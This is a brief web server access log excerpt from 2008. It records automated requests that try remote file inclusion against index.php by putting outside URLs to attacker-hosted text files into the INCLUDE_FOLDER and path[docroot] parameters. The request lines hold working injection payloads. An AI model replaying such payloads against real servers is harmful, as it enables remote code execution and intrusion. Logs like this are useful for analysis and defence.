213.33.84.163 - - [06/Aug/2008:20:36:08 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.listitsellit.us/adpics/readme.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.33.84.163 - - [06/Aug/2008:20:36:08 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.listitsellit.us/adpics/readme.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.93.56.170 - - [06/Aug/2008:20:36:17 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.astrakhan.ru/gameserver/log.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
80.93.56.170 - - [06/Aug/2008:20:36:17 -0500] "GET //?path%5Bdocroot%5D=http://www.astrakhan.ru/gameserver/log.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
